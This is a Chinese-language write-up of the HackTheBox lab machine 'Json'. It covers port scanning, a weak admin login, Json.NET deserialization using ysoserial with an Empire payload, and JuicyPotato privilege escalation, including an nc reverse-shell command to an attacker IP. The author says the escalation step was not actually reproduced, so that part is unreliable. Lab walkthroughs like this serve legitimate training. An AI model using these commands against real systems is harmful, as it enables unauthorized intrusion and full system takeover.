大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Json”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为中等级别,任务是找到靶机上的user.txt和root.txt。
摘要
- Json.net 反序列 getshell
- JuicePotato 提权
信息收集
nmap 扫出了 22 , 80 端口
nmap -sC -sV -p- -T4 10.10.10.158 Host is up (0.052s latency). Not shown: 65521 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp FileZilla ftpd | ftp-syst: |_ SYST: UNIX emulated by FileZilla 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: Json HTB 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49154/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
主页登录盲猜弱口令
admin:admin
进去管理系统没什么功能
登录框抓包发现猫腻
改包为GET后发现bearer参数
bearer参数是json类型
把 json 参数打乱
{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3",hello world}
Json.net反序列 getshell
发现json.net反序列
利用 ysoserial.exe 进行参数注入getshell
ysoserial.exe 配合 empire的powershell payload 获取shell
empire下操作: ./empire uselistener http set Host http://10.10.xx.xx:4444 set Port 4444 execute back launcher powershell >>获得$$Empire payload$$ windows下操作: ysoserial.exe -g ObjectDataProvider -f json.net -c "$$Empire Payload$$" -o base64
获取user.txt
Juice potato 提权
检查windows版本
(empire:XXXXXXX)shell systeminfo | findstr Windows OS Name: Microsoft Windows Server 2012 R2 Datacenter
用户有 SeImpersonatePrivilege 权限
(empire:XXXXXXX)shell whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
windows server 2019之前可以使用 juicypotato 提权工具
依靠 SeImpersonatePrivilege 权限,我们应该可以提到 system 权限
nc -lvp 4444 (empire:XXXXXXX)cd \windows\temp (empire:XXXXXXX)shell copy \\10.10.xx.xx\n00B\JuicyPotato.exe . (empire:XXXXXXX)shell copy \\10.10.xx.xx\n00B\nc.exe . (empire:XXXXXXX)shell echo c:\windows\temp\nc.exe 10.10.xx.xx 4444 -e cmd.exe > start.bat (empire:XXXXXXX)shell JuicyPotato.exe -l 1337 -p C:\\windows\temp\start.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
获取root.txt,提权过程没时间复现,思路是对的。
